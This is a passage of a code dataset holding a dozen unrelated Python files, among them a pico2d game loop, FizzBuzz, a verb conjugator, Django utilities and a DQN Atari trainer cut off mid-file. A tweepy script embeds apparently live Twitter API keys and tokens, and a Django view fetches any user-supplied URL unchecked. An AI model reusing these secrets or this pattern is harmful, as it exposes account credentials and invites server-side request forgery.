epochs, \n 'DROPOUT' : True})\n \n run = Run(RUN_PARAMS)\n\n run.train()\n","sub_path":"tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":23996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"102897622","text":"from pico2d import *\n\ndef handle_events():\n global running,x,y,dx\n evts=get_events()\n for e in evts:\n if e.type==SDL_QUIT:\n running=False\n elif e.type==SDL_KEYDOWN:\n if e.key==SDLK_ESCAPE:\n running=False\n elif e.key==SDLK_LEFT:\n dx-=1\n elif e.key==SDLK_RIGHT:\n dx+=1\n print('keydown',dx)\n elif e.type==SDL_KEYUP:\n if e.key==SDLK_LEFT:\n dx+=1\n elif e.key==SDLK_RIGHT:\n dx-=1\n elif e.type==SDL_MOUSEMOTION:\n x,y=e.x,get_canvas_height()-e.y-1\n\nopen_canvas()\n\ngra=load_image('grass.png')\nch=load_image('run_animation.png')\n\nrunning=True\nx,y=400,85\ndx=0\nfidx=0\nwhile running:\n clear_canvas()\n gra.draw(400,30)\n ch.clip_draw(fidx*100,0,100,100,x,85)\n update_canvas()\n x+=dx\n\n handle_events()\n\n fidx=(fidx+1)%8\n \n delay(0.01)\n\nclose_canvas()\n","sub_path":"3주차 애니메이션/move_character_with_mouse.py","file_name":"move_character_with_mouse.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234512452","text":"# On CodeEval, test cases are read in from a file which is the first argument to your program\n# Open the file and read in line by line. Each line represents a different test case\n# (unless given different instructions in the challenge description)\n\nimport sys\n\n#sys.argv[1]\ntest_cases = open(sys.argv[1], 'r')\n\nfor test in test_cases:\n # ignore test if it is an empty line\n # 'test' represents the test case, do something with it\n # ...\n # ...\n\n #need the characters\n numlist = test.split()\n if not numlist:\n continue\n x, y, n = numlist\n\n x = int(x)\n y = int(y)\n\n if ( x > 20 or x < 1 ):\n exit()\n if ( y > 20 or y < 1 ):\n exit()\n\n #restring\n string =\"\"\n\n #test nums 1 - n\n for i in range(1, int(n)+1):\n #fizz\n if (i%x == 0):\n if (i%y == 0):\n string = string + \" FB\"\n continue\n string = string + \" F\"\n continue\n \n elif (i%y == 0):\n if (i%x == 0):\n string = string + \" FB\"\n continue\n string = string + \" B\"\n continue\n\n \n else: string = string + \" \" + str(i)\n\n print (string[1:])\n\ntest_cases.close()\n","sub_path":"fizzbuzz/fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"643008296","text":"'''\nCreated on 15 Jul 2015\n\n@author: rstones\n'''\nimport numpy as np\nimport counting_statistics.counting_statistics as cs\nimport quant_mech.utils as utils\nimport matplotlib.pyplot as plt\nfrom vibration_counting_statistics.dimer_vib_model import DimerVibModel\n\nfreq_range = np.linspace(0, 2.5, 100)\n\nmodel = DimerVibModel()\nmodel.J = 0.2\n\nF2 = np.zeros((3, freq_range.size))\n\nmodel.mode_coupling = 0\nL = model.liouvillian\nL_dim = L().shape[0]\nL_jump = model.jump_liouvillian\ndm_pops = np.eye(np.sqrt(L_dim)).flatten()\nss = utils.stationary_state(L(), populations=dm_pops)\nF2[0] = cs.second_order_fano_factor(L, L_jump, ss, freq_range, dm_pops)\n\nmodel.mode_coupling = 0.3\nmode_freq_vals = np.array([1., 2.])\nfor i,freq in enumerate(mode_freq_vals):\n model.omega = freq\n L = model.liouvillian\n L_dim = L().shape[0]\n L_jump = model.jump_liouvillian\n dm_pops = np.eye(np.sqrt(L_dim)).flatten()\n ss = utils.stationary_state(L(), populations=dm_pops)\n F2[i+1] = cs.second_order_fano_factor(L, L_jump, ss, freq_range, dm_pops)\n \nnp.savez('../../data/dimer_vib_finite_freq_F2_data.npz', freq_range=freq_range, F2=F2, mode_freq_vals=mode_freq_vals)\n\nfor row in F2:\n plt.plot(freq_range, row)\nplt.show()","sub_path":"vibration_counting_statistics/src/vibration_counting_statistics/dimer_vib_noise.py","file_name":"dimer_vib_noise.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"516658633","text":"#!/usr/bin/env python3\n\"\"\"manage.py for django admin functions.\n\nhttps://docs.djangoproject.com/en/2.0/ref/django-admin/\n\"\"\"\n\nimport os\nfrom pathlib import Path\nimport site\nimport sys\n\nfrom colorama import init as color_init\nfrom termcolor import colored\nfrom dotenv import find_dotenv, load_dotenv\n\n\ndef get_env_variable(name, console=False):\n \"\"\"Get the specified environment variable.\n\n :param name: The name of the variable.\n :type name: str\n :param console: Whether or not this is run via the console or from within django.\n :type console: bool\n :returns: The value of the specified variable.\n :raises: **ImproperlyConfigured** when the specified variable does not exist.\n\n \"\"\"\n try:\n return os.environ[name]\n except KeyError:\n error_msg = \"The {variable_name} environment variable is not set!\\n\".format(\n variable_name=name)\n\n if console:\n color_init()\n sys.stderr.write(\n colored(text=\"ImproperlyConfigured: \" + error_msg, color='red', attrs=['bold']))\n sys.exit(1)\n else:\n from django.core.exceptions import ImproperlyConfigured\n raise ImproperlyConfigured(error_msg)\n\n\ndef activate_env():\n \"\"\"Activates the virtual environment for this project.\"\"\"\n virtualenv_home = Path(get_env_variable(\"WORKON_HOME\", console=True))\n\n filepath = Path(__file__).resolve()\n repo_name = filepath.parents[1].name\n project_name = filepath.parents[0].name\n\n # Add the site-packages of the chosen virtualenv to work with\n site.addsitedir(str(virtualenv_home.joinpath(\n repo_name, \"Lib\", \"site-packages\")))\n\n # Add the app's directory to the PYTHONPATH\n sys.path.append(str(filepath.parents[1]))\n sys.path.append(str(filepath.parents[1].joinpath(project_name)))\n\n # Load .env file\n load_dotenv(find_dotenv())\n\n # Activate the virtual env\n # activate_env = virtualenv_home.joinpath(repo_name, \"bin\", \"activate_this.py\")\n\n #exec(compile(open(str(activate_env)).read(), str(activate_env), 'exec'), dict(__file__=str(activate_env)))\n\n\nif __name__ == \"__main__\":\n if \"test\" in sys.argv:\n os.environ['DJANGO_SETTINGS_MODULE'] = \"uh_internal.settings.test\"\n\n color_init()\n activate_env()\n\n import django\n django.setup()\n\n from django.core.management import execute_from_command_line\n execute_from_command_line(sys.argv)\n","sub_path":"uh_internal/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"612628926","text":"# encoding: utf-8\n\"\"\"\nFunção:\n Conjugador de verbos regulares\nAutor:\n Edkallenn\nDescrição:\n Esse programa serve para conjugar verbos regulares e demonstra o poder das\n listas na linguagem Python. Listas são mutáveis e são objetos facilmente\n manipuláveis através de seus métodos\nComplexidade:\n n\nReferências:\n https://pt.wikipedia.org/wiki/Verbo\n\"\"\"\n#verbo = 'programar'\nverbo = str(raw_input(\"Digite um verbo da regular: \"))\nterminacao = verbo[-2:]\nradical = verbo[:-2]\nconjuga_ar_presente = ['o','as','a','amos','ais','am']\nconjuga_ar_preteritop = ['ei','aste','ou','amos','astes','aram']\nconjuga_ar_preteritoi = ['ava','avas','ava','ávamos','áveis','avam']\nconjuga_ar_preteritomqp = ['ara','aras','ara','áramos','áreis','aram']\nconjuga_ar_futurop = ['arei','arás','ará','aremos','areis','arão']\nconjuga_ar_futuropret = ['aria','arias','aria','aríamos','aríeis','ariam']\nconjuga_gerundio_ar='ando'\nconjuga_participio_ar='ado'\nconjuga_er_presente = ['o','es','e','emos','eis','em']\nconjuga_er_preteritop = ['i','este','eu','emos','estes','eram']\nconjuga_er_preteritoi = ['ia','ias','ia','íamos','íeis','iam']\nconjuga_er_preteritomqp = ['era','eras','era','êramos','êreis','eram']\nconjuga_er_futurop = ['erei','erás','erá','eremos','ereis','erão']\nconjuga_er_futuropret = ['eria','erias','eria','eríamos','eríeis','eriam']\nconjuga_gerundio_er='endo'\nconjuga_participio_er='ido'\nconjuga_ir_presente = ['o','es','e','imos','is','em']\nconjuga_ir_preteritop = ['i','iste','iu','imos','istes','iram']\nconjuga_ir_preteritoi = ['ia','ias','ia','íamos','íeis','iam']\nconjuga_ir_preteritomqp = ['ira','iras','ira','íramos','íreis','iram']\nconjuga_ir_futurop = ['irei','irás','irá','iremos','ireis','irão']\nconjuga_ir_futuropret = ['iria','irias','iria','iríamos','iríeis','iriam']\nconjuga_gerundio_ir='indo'\nconjuga_participio_ir='ido'\npronomes=['eu','tu','ele','nós','vós','eles']\ntempos_indicativo = ['Presente', 'Pretérito Perfeito', 'Pretérito Imperfeito', 'Pretérito Mais-que-perfeito', 'Futuro do Presente', 'Futuro do Pretérito']\n\nprint(\"Verbo: \" + verbo + '\\n' + '================')\nif terminacao=='ar':\n print('Gerúndio: ' + radical + conjuga_gerundio_ar)\n print('Particípio: ' + radical + conjuga_participio_ar + '\\n')\n j = 0\n print(tempos_indicativo[j] + '\\n' + '==============')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_presente[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_preteritop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '====================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_preteritoi[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==========================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_preteritomqp[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_futurop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '===================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_futuropret[i])\n print('\\n')\nif terminacao=='er':\n print('Gerúndio: ' + radical + conjuga_gerundio_er)\n print('Particípio: ' + radical + conjuga_participio_er + '\\n')\n j = 0\n print(tempos_indicativo[j] + '\\n' + '==============')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_presente[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_preteritop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '====================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_preteritoi[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==========================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_preteritomqp[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_futurop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '===================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_futuropret[i])\n print('\\n')\nif terminacao=='ir':\n print('Gerúndio: ' + radical + conjuga_gerundio_ir)\n print('Particípio: ' + radical + conjuga_participio_ir + '\\n')\n j = 0\n print(tempos_indicativo[j] + '\\n' + '==============')\n j+=1\n radical_ir=radical.replace ('e','i')\n for i in range(6):\n if i==0:\n print(pronomes[i] + ' ' + radical_ir + conjuga_ir_presente[i])\n else:\n print(pronomes[i] + ' ' + radical + conjuga_ir_presente[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ir_preteritop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '====================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ir_preteritoi[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==========================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ir_preteritomqp[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ir_futurop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '===================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ir_futuropret[i])\n print('\\n')\n\n \n","sub_path":"Fontes/Python2/ConjugaVerbos.py","file_name":"ConjugaVerbos.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287636974","text":"from aws_cdk import (\n aws_iam as iam,\n aws_lambda as l,\n core\n)\n\n\nclass InsiderStack(core.Stack):\n\n def __init__(self, scope: core.Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n resource_layer = l.LayerVersion(\n self, 'ResourceLayer',\n code=l.Code.asset('./repos/resources'),\n compatible_runtimes=[l.Runtime.PYTHON_3_8],\n layer_version_name=\"resource_layer\",\n license=\"MIT\"\n )\n\n request_movers = l.Function(\n self, \"RetrieveMovers\",\n runtime=l.Runtime.PYTHON_3_8,\n code=l.Code.asset(\"./repos/python\"),\n handler=\"retrieve_movers.handler\",\n layers=[resource_layer],\n )\n\n request_movers.role.add_managed_policy(\n iam.ManagedPolicy.from_managed_policy_arn(self,\n id=\"AWSLambda_FullAccess\",\n managed_policy_arn=\"arn:aws:iam::aws:policy/AWSLambda_FullAccess\")\n )\n","sub_path":"insider_stack.py","file_name":"insider_stack.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"40335909","text":"from sklearn.svm import LinearSVC\nfrom sklearn.datasets import make_classification\nimport numpy as np\ndef logreg_model(train,seen_classes,classes):\n\tmodels = {}\n\tfor x in seen_classes:\n\t\tclf = LinearSVC(random_state=0, tol=1e-5)\n\t\tY = classes[:,x]\n\t\tY.shape = (train.shape[0],1)\n\t\tmodel = clf.fit(train, Y)\n\t\tmodels[x]=model\n\treturn models","sub_path":"Logreg.py","file_name":"Logreg.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380146850","text":"import time\nimport tweepy\nimport csv\n\nconsumer_key = 'eeSnutOqqknGGGqiso8DPEfdn'\nconsumer_secret = 'uqKKBzpp96NJTBwEBge9wmsVKEJBdoSuMOmsaQiUphikReuJaH'\naccess_token = \"1276097905363828736-RQfCc3FuSvhdwyYhjpoDfO7QH6Q4gB\"\naccess_token_secret = \"nL8jdSU1j0cuRNiGGum8uTaLrq0blGEwqI8kmfwzAMSsJ\"\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\n#results = api.search('#covid', count=100, lang=\"en\", since=\"2020-01-01\")\n\ncsvFile = open('hackathon.csv','w')\ncsvwriter = csv.writer(csvFile)\n\nfor item in tweepy.Cursor(api.search,q=\"#covid\",count=100,\n lang=\"en\",\n since=\"2020-01-01\").items():\n\tcsvwriter.writerow([item.user.screen_name.encode(\"utf-8\"),item.text.encode(\"utf-8\"),item.user.followers_count])\n","sub_path":"Desktop/Santushti/ibm/test_again.py","file_name":"test_again.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"331842556","text":"from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n# Create your views here.\nimport requests\nfrom datetime import datetime\n\n@api_view(['GET',])\ndef date_check(request,format= None):\n \"\"\"\n pass the params as key value pairs for eg:-\n url = https://httpbin.org\n datetime = yy-mm-dd HH-MM\n sample url\n 'http://127.0.0.1:8000/?url=https://httpbin.org&datetime=2020-05-24 11:25'\n if success returns\n 'status':200\n \"\"\"\n #get the params\n query_date = request.query_params.get('datetime')\n query_url = request.query_params.get('url')\n #get the current time\n now = datetime.now().strftime('%Y-%m-%d %H:%M')\n #print the time for reference\n print(now)\n #if the requested date is same as 'now'\n if query_date == now:\n #send a get request to the param URL\n response = requests.get(query_url)\n \n if response.status_code == 200:#returns the status code \n return Response(data={'status':200})\n\n else:#if the website did not get the request return error\n return Response(data={'status':'error'})\n\n else: #if the time did not match\n return Response(data={'error':'date-time does not match'})\n\n@api_view(['GET',])\ndef ping(request,format= None):\n \"\"\"\n /ping/ to check status of the server\n returns a 'status:OK' object\n \"\"\"\n return Response(data={'status':'OK'})","sub_path":"dateverification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646355577","text":"#!/usr/bin/env python\n#combine and tile multi image for one\n\nimport os\nimport re\nfrom PIL import Image\nimport pygame\n\n#image file name must be combined for 'XXX00,XXX01...',giving XXX to this function and it will combined them to one tile image object\ndef imcombine(fheadname,path):\n\t#count is used to looking for how many file\n\tcount=0\n\tfilelist=[]\n\tfor dirpath,dirnames,filenames in os.walk(path):\n\t\tfor ifile in filenames:\n\t\t\tpattern=fheadname+'[0-9]*'\n\t\t\tmatch=re.match(pattern,ifile)\n\t\t\tif match!=None:\n\t\t\t\tprint(ifile,':match')\n\t\t\t\tcount+=1\n\t\t\t\tfilelist.append(ifile)\n\t\t\telse:\n\t\t\t\tprint(ifile,':nomatch')\n\tfilelist.sort()\n\tprint(filelist)\n\tim=Image.open(path+'/'+filelist[0])\n\tw=im.size[0]\n\th=im.size[1]\n\tbackground=Image.new('RGBA',(w*count,h))\n\ti=0\n\tfor f in filelist:\n\t\timage=Image.open(path+'/'+f)\n\t\tbackground.paste(image,(w*i,0))\n\t\ti+=1\n\tbgw,bgh=background.size\n\tbgstring=background.tostring()\n\tbg=pygame.image.fromstring(bgstring,(bgw,bgh),'RGBA')\n\tanim=[]\n\tbgw,bgh=bg.get_size()\n\tfor i in xrange(int(bgw/w)):\n\t\tanim.append(bg.subsurface((i*w,0,w,h)))\n\treturn anim\n\t\t\t\n\t\n\t\n\t\nif __name__=='__main__':\n\tpath=os.getcwd()+'/data'\n\tprint(path)\n\timcombine('chief-',path)\n\n","sub_path":"imcombine.py","file_name":"imcombine.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"348390511","text":"# %%writefile dqn-train.py\n# To run this file, use normal command in the cell below like \n# python3 dqn-train.py --game PongDeterminstic --frameskip 1 --train\n#Train a DQN Agent to play a specific game\n\n#CONSTANTS\nTRAIN = None # Boolean value indicating whether the model is to be trained or evaluated\nSAVE = None # Boolean value indicating whether model needs to be saved \nLOAD = None # Boolean value indicating whether model needs to be saved for further training\n\nGAME = None # Name of game\nENV_NAME = None # Name of the environment in ALE\nENV_FRAME_SHAPE = [210, 160, 3] # Shape of frames in the environment\nFRAME_SKIP = None # Count of frame-skip value; FRAME_SKIP = 1 means no frame skipping \n\n#CONTROL PARAMETERS\nMAX_EPISODE_LENGTH = 72000 # Equivalent of 20 minutes of gameplay at 60 frames per second\nSAVE_FREQUENCY = None # Model saved after every SAVE_FREQUENCY timesteps\nEVAL_FREQUENCY = 1000000 # Number of time_steps between evaluations\nEVAL_STEPS = None # Number of frames for one evaluation\nNETW_UPDATE_FREQ = None # Number of time_steps between updating the target network. \n # set to min(10000*FRAME_SKIP, 160000)\nDISCOUNT_FACTOR = None # gamma in the Bellman equation\nREPLAY_MEMORY_START_SIZE = 200000# Number of completely random timesteps, \n # before the agent starts learning\nMAX_STEPS = None # Total number of frames the agent sees\nTRAIN_STEPS = None # Total number of frames that the agent sees in current iterations\nMEMORY_SIZE = None # Number of transitions stored in the replay memory\nNO_OP_STEPS = 10 # Number of 'NOOP' or 'FIRE' actions at the beginning of an \n # evaluation episode\nUPDATE_FREQ = None # Every four actions a gradient descend step is performed: set to max(FRAME_SKIP, 16)\nHIDDEN = 1024 # Number of filters in the final convolutional layer. The output \n # has the shape (1,1,1024) which is split into two streams. Both \n # the advantage stream and value stream have the shape \n # (1,1,512).\nTARGET_LEARNING_RATE = 0.00001 # Learning rate of target network\nLEARNING_RATE = 0.00025 # Set to 0.00025 for quicker results. \nBS = 32 # Batch size\nAGENT_HISTORY_LENGTH = 4 # Number of frames stacked together to create a state\nSEED_OFFSET = None # Offset of seed to get a few random runs\n# FRACTION_GPU = 0.95 # If running multiple instances on same GPU, reduce it to 0.45 (for 2) else 1\n\n# OBJECT VARIABLES\nMAIN_DQN = None\nTARGET_DQN = None\ninit = None\nsaver = None\nMAIN_DQN_VARS = None\natari = None\nTARGET_DQN_VARS = None\n\n# PATH VARIABLES\nPATH = None\nSUMMARIES = None\nRUNID = None\n\n### Suppress warnings and tensorflow debug info\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport argparse\nimport random\nimport gym\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\nimport numpy as np\nimport imageio\nfrom skimage.transform import resize\nimport pickle\nos.environ['TF_CUDNN_DETERMINISTIC']='1'\nos.environ['TF_DETERMINISTIC_OPS'] = '1'\n\n# config = tf.ConfigProto()\n# config.gpu_options.per_process_gpu_memory_fraction = FRACTION_GPU\n\nclass FrameProcessor:\n \"\"\"Resizes and converts RGB Atari frames to grayscale\"\"\"\n def __init__(self, frame_height=84, frame_width=84):\n \"\"\"\n Args:\n frame_height: Integer, Height of a frame of an Atari game\n frame_width: Integer, Width of a frame of an Atari game\n \"\"\"\n self.frame_height = frame_height\n self.frame_width = frame_width\n self.frame = tf.placeholder(shape=ENV_FRAME_SHAPE, dtype=tf.uint8)\n self.processed = tf.image.rgb_to_grayscale(self.frame)\n self.processed = tf.image.crop_to_bounding_box(self.processed, 34, 0, 160, 160)\n self.processed = tf.image.resize_images(self.processed, [self.frame_height, self.frame_width], \n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n \n def __call__(self, session, frame):\n \"\"\"\n Args:\n session: A Tensorflow session object\n frame: A ENV_FRAME_SHAPE frame of an Atari game in RGB\n Returns:\n A processed (frame_height, frame_width, 1) frame in grayscale\n \"\"\"\n return session.run(self.processed, feed_dict={self.frame:frame})\n\nclass DQN:\n \"\"\"Implements a Deep Q Network\"\"\"\n \n # pylint: disable=too-many-instance-attributes\n \n def __init__(self, n_actions, hidden, learning_rate,\n agent_history_length, frame_height=84, frame_width=84):\n \"\"\"\n Args:\n n_actions: Integer, number of possible actions\n hidden: Integer, Number of filters in the final convolutional layer. \n This is different from the DeepMind implementation\n learning_rate: Float, Learning rate for the Adam optimizer\n frame_height: Integer, Height of a frame of an Atari game\n frame_width: Integer, Width of a frame of an Atari game\n agent_history_length: Integer, Number of frames stacked together to create a state\n \"\"\"\n self.n_actions = n_actions\n self.hidden = hidden\n self.learning_rate = learning_rate\n self.frame_height = frame_height\n self.frame_width = frame_width\n self.agent_history_length = agent_history_length\n \n self.input = tf.placeholder(shape=[None, self.frame_height, \n self.frame_width, self.agent_history_length], \n dtype=tf.float32)\n # Normalizing the input\n self.inputscaled = self.input/255\n \n # Convolutional layers\n self.conv1 = tf.layers.conv2d(\n inputs=self.inputscaled, filters=32, kernel_size=[8, 8], strides=4,\n kernel_initializer=tf.variance_scaling_initializer(scale=2),\n padding=\"valid\", activation=tf.nn.relu, use_bias=False, name='conv1')\n self.conv2 = tf.layers.conv2d(\n inputs=self.conv1, filters=64, kernel_size=[4, 4], strides=2, \n kernel_initializer=tf.variance_scaling_initializer(scale=2),\n padding=\"valid\", activation=tf.nn.relu, use_bias=False, name='conv2')\n self.conv3 = tf.layers.conv2d(\n inputs=self.conv2, filters=64, kernel_size=[3, 3], strides=1, \n kernel_initializer=tf.variance_scaling_initializer(scale=2),\n padding=\"valid\", activation=tf.nn.relu, use_bias=False, name='conv3')\n self.conv4 = tf.layers.conv2d(\n inputs=self.conv3, filters=self.hidden, kernel_size=[7, 7], strides=1,\n kernel_initializer=tf.variance_scaling_initializer(scale=2),\n padding=\"valid\", activation=tf.nn.relu, use_bias=False, name='conv4')\n \n # Splitting into value and advantage stream\n self.valuestream, self.advantagestream = tf.split(self.conv4, 2, 3)\n self.valuestream = tf.layers.flatten(self.valuestream)\n self.advantagestream = tf.layers.flatten(self.advantagestream)\n self.advantage = tf.layers.dense(\n inputs=self.advantagestream, units=self.n_actions,\n kernel_initializer=tf.variance_scaling_initializer(scale=2), name=\"advantage\")\n self.value = tf.layers.dense(\n inputs=self.valuestream, units=1, \n kernel_initializer=tf.variance_scaling_initializer(scale=2), name='value')\n \n # Combining value and advantage into Q-values as described above\n self.q_values = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keepdims=True))\n self.best_action = tf.argmax(self.q_values, 1)\n \n # The next lines perform the parameter update. This will be explained in detail later.\n # targetQ according to Bellman equation: \n # Q = r + gamma*max Q', calculated in the function learn()\n self.target_q = tf.placeholder(shape=[None], dtype=tf.float32)\n # Action that was performed\n self.action = tf.placeholder(shape=[None], dtype=tf.int32)\n # Q value of the action that was performed\n self.Q = tf.reduce_sum(tf.multiply(self.q_values, tf.one_hot(self.action, self.n_actions, dtype=tf.float32)), axis=1)\n \n # Parameter updates\n self.loss = tf.reduce_mean(tf.losses.huber_loss(labels=self.target_q, predictions=self.Q))\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)\n self.update = self.optimizer.minimize(self.loss)\n\nclass ExplorationExploitationScheduler:\n \"\"\"Determines an action according to an epsilon greedy strategy with annealing epsilon\"\"\"\n def __init__(self, DQN, n_actions, replay_memory_start_size, max_steps,\n eps_initial=1, eps_final=0.1, eps_final_step=0.01, \n eps_evaluation=0.0, eps_annealing_steps=4000000):\n \"\"\"\n Args:\n DQN: A DQN object\n n_actions: Integer, number of possible actions\n eps_initial: Float, Exploration probability for the first \n replay_memory_start_size frames\n eps_final: Float, Exploration probability after \n replay_memory_start_size + eps_annealing_frames frames\n eps_final_frame: Float, Exploration probability after max_frames frames\n eps_evaluation: Float, Exploration probability during evaluation\n eps_annealing_frames: Int, Number of frames over which the \n exploration probabilty is annealed from eps_initial to eps_final\n replay_memory_start_size: Integer, Number of frames during \n which the agent only explores\n max_frames: Integer, Total number of frames shown to the agent\n \"\"\"\n self.n_actions = n_actions\n self.eps_initial = eps_initial\n self.eps_final = eps_final\n self.eps_final_step = eps_final_step\n self.eps_evaluation = eps_evaluation\n self.eps_annealing_steps = eps_annealing_steps\n self.replay_memory_start_size = replay_memory_start_size\n self.max_steps = max_steps\n \n # Slopes and intercepts for exploration decrease\n self.slope = -(self.eps_initial - self.eps_final)/self.eps_annealing_steps\n self.intercept = self.eps_initial - self.slope*self.replay_memory_start_size\n self.slope_2 = -(self.eps_final - self.eps_final_step)/(self.max_steps - self.eps_annealing_steps - self.replay_memory_start_size)\n self.intercept_2 = self.eps_final_step - self.slope_2*self.max_steps\n \n self.DQN = DQN\n\n def get_action(self, session, time_step, state, evaluation=False):\n \"\"\"\n Args:\n session: A tensorflow session object\n time_step: Integer, number of the current time_step\n state: A (84, 84, 4) sequence of frames of an Atari game in grayscale\n evaluation: A boolean saying whether the agent is being evaluated\n Returns:\n An integer between 0 and n_actions - 1 determining the action the agent perfoms next\n \"\"\"\n if evaluation:\n eps = self.eps_evaluation\n elif time_step < self.replay_memory_start_size:\n eps = self.eps_initial\n elif time_step >= self.replay_memory_start_size and time_step < self.replay_memory_start_size + self.eps_annealing_steps:\n eps = self.slope*time_step + self.intercept\n elif time_step >= self.replay_memory_start_size + self.eps_annealing_steps and time_step < self.max_steps:\n eps = self.slope_2*time_step + self.intercept_2\n else:\n eps = self.eps_final_step\n\n if random.random() < eps:\n return random.randrange(0, self.n_actions)\n return session.run(self.DQN.best_action, feed_dict={self.DQN.input:[state]})[0] \n\nclass ReplayMemory:\n \"\"\"Replay Memory that stores the last size=1,000,000 transitions\"\"\"\n def __init__(self, size, agent_history_length, batch_size, \n frame_height=84, frame_width=84):\n \"\"\"\n Args:\n size: Integer, Number of stored transitions\n frame_height: Integer, Height of a frame of an Atari game\n frame_width: Integer, Width of a frame of an Atari game\n agent_history_length: Integer, Number of frames stacked together to create a state\n batch_size: Integer, Number if transitions returned in a minibatch\n \"\"\"\n self.size = size\n self.frame_height = frame_height\n self.frame_width = frame_width\n self.agent_history_length = agent_history_length\n self.batch_size = batch_size\n self.count = 0\n self.current = 0\n \n # Pre-allocate memory\n self.actions = np.empty(self.size, dtype=np.int32)\n self.rewards = np.empty(self.size, dtype=np.float32)\n self.frames = np.empty((self.size, self.frame_height, self.frame_width), dtype=np.uint8)\n self.terminal_flags = np.empty(self.size, dtype=np.bool)\n \n # Pre-allocate memory for the states and new_states in a minibatch\n self.states = np.empty((self.batch_size, self.agent_history_length, \n self.frame_height, self.frame_width), dtype=np.uint8)\n self.new_states = np.empty((self.batch_size, self.agent_history_length, \n self.frame_height, self.frame_width), dtype=np.uint8)\n self.indices = np.empty(self.batch_size, dtype=np.int32)\n \n def add_experience(self, action, frame, reward, terminal):\n \"\"\"\n Args:\n action: An integer between 0 and env.action_space.n - 1 \n determining the action the agent perfomed\n frame: A (84, 84, 1) frame of an Atari game in grayscale\n reward: A float determining the reward the agend received for performing an action\n terminal: A bool stating whether the episode terminated\n \"\"\"\n if frame.shape != (self.frame_height, self.frame_width):\n raise ValueError('Dimension of frame is wrong!')\n self.actions[self.current] = action\n self.frames[self.current, ...] = frame\n self.rewards[self.current] = reward\n self.terminal_flags[self.current] = terminal\n self.count = max(self.count, self.current+1)\n self.current = (self.current + 1) % self.size\n \n def _get_state(self, index):\n if self.count is 0:\n raise ValueError(\"The replay memory is 